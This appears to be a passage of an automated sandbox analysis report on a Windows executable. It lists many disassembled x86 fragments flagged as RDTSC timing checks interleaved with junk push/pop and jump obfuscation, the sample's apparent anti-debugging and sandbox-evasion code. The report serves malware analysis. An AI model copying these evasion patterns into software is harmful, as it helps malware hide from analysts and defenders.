                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF183 second address: 6BF198 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FBF78ADB278h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF29C second address: 6BF2A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8B2A second address: 6E8B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8B34 second address: 6E8B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8B39 second address: 6E8B46 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBF78ADB278h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CA4 second address: 6E8CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CAA second address: 6E8CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CAE second address: 6E8CB4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CB4 second address: 6E8CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CBA second address: 6E8CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FBF78E7B356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CC5 second address: 6E8CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBF78ADB276h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CD7 second address: 6E8CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CDB second address: 6E8CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBF78ADB27Eh 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8CFA second address: 6E8D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8D05 second address: 6E8D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8ED0 second address: 6E8EE4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78E7B35Eh 0x00000008 jnc 00007FBF78E7B356h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8EE4 second address: 6E8F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FBF78ADB276h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBF78ADB284h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8F0C second address: 6E8F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FBF78E7B362h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E905F second address: 6E9069 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBF78ADB282h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9069 second address: 6E907F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78E7B356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FBF78E7B377h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDC4F second address: 6EDC63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FBF78ADB27Eh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EDF57 second address: 6EDF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 je 00007FBF78E7B356h 0x0000000e jmp 00007FBF78E7B361h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FBF78E7B361h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EE510 second address: 6EE516 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F02FD second address: 6F0302 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F0302 second address: 6F0346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FBF78ADB281h 0x0000000b push esi 0x0000000c pop esi 0x0000000d ja 00007FBF78ADB276h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FBF78ADB27Ch 0x0000001e pushad 0x0000001f popad 0x00000020 jmp 00007FBF78ADB27Ah 0x00000025 jns 00007FBF78ADB276h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F3FF7 second address: 6F4021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B362h 0x00000009 popad 0x0000000a je 00007FBF78E7B358h 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jg 00007FBF78E7B356h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66E4A1 second address: 66E4BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FBF78ADB285h 0x0000000c jmp 00007FBF78ADB27Fh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBF11 second address: 6FBF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FBF78E7B356h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAE6A second address: 6FAE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAE73 second address: 6FAE8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Eh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB54D second address: 6FB551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB551 second address: 6FB559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB559 second address: 6FB565 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBF78ADB27Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB808 second address: 6FB80E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB80E second address: 6FB82A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB281h 0x00000007 pushad 0x00000008 jnp 00007FBF78ADB276h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FB82A second address: 6FB830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA6FF second address: 6FA70E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78ADB276h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA70E second address: 6FA714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA714 second address: 6FA738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF78ADB289h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA738 second address: 6FA75B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBF78E7B35Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE40 second address: 6FEE4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBF78ADB276h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704300 second address: 70430E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007FBF78E7B356h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709613 second address: 70965F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78ADB286h 0x00000009 jmp 00007FBF78ADB289h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBF78ADB285h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70965F second address: 709665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709665 second address: 709669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709669 second address: 709678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007FBF78E7B356h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB03 second address: 70CB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB09 second address: 70CB28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FBF78E7B365h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70CB28 second address: 70CB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C2AF second address: 70C2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FBF78E7B356h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C2B9 second address: 70C2C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FBF78ADB278h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70C591 second address: 70C5A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBF78E7B35Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710892 second address: 71089C instructions: 0x00000000 rdtsc 0x00000002 js 00007FBF78ADB27Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710B2A second address: 710B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B367h 0x00000007 push edi 0x00000008 jmp 00007FBF78E7B363h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007FBF78E7B364h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710E44 second address: 710E4A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 710E4A second address: 710E5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78E7B35Eh 0x00000008 jnl 00007FBF78E7B356h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEBE7 second address: 6BEBEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEBEC second address: 6BEC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2993h], ecx 0x00000012 mov ebx, dword ptr [ebp+1248FB40h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FBF78E7B358h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edi, 697BB19Dh 0x00000037 and ecx, 5339D560h 0x0000003d add eax, ebx 0x0000003f mov dword ptr [ebp+1245861Fh], ecx 0x00000045 push eax 0x00000046 jnc 00007FBF78E7B368h 0x0000004c mov dword ptr [esp], eax 0x0000004f push ebx 0x00000050 jmp 00007FBF78E7B35Ch 0x00000055 pop ecx 0x00000056 push 00000004h 0x00000058 sub edi, 20C59E2Dh 0x0000005e nop 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC73 second address: 6BEC8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC8E second address: 6BEC94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BEC94 second address: 6BECBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB27Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBF78ADB285h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BECBD second address: 6BECD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBF78E7B366h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BECD7 second address: 6BECDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716D4B second address: 716D69 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FBF78E7B368h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EE3 second address: 716EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EE8 second address: 716EF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF78E7B35Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716EF2 second address: 716F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 jmp 00007FBF78ADB286h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7174AE second address: 7174C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B360h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7174C7 second address: 7174E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78ADB288h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182A7 second address: 7182AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182AB second address: 7182B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182B1 second address: 7182E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B364h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBF78E7B368h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182E3 second address: 7182E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182E7 second address: 7182F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7182F5 second address: 718307 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBF78ADB276h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FBF78ADB278h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718307 second address: 718325 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF78E7B366h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718325 second address: 718329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718329 second address: 718333 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBF78E7B356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212C4 second address: 7212D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jno 00007FBF78ADB278h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212D5 second address: 7212D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7212D9 second address: 7212DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72071E second address: 72072B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FBF78E7B356h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720884 second address: 720889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720889 second address: 7208B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Ch 0x00000009 jmp 00007FBF78E7B369h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208B9 second address: 7208BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7208BD second address: 7208CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720B79 second address: 720B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720B81 second address: 720B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D17 second address: 720D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBF78ADB289h 0x0000000c jmp 00007FBF78ADB284h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 720D4B second address: 720D59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF78E7B35Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729199 second address: 72919E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72919E second address: 7291B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF78E7B35Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7291B5 second address: 7291B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72789D second address: 7278A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727A01 second address: 727A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727B86 second address: 727B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
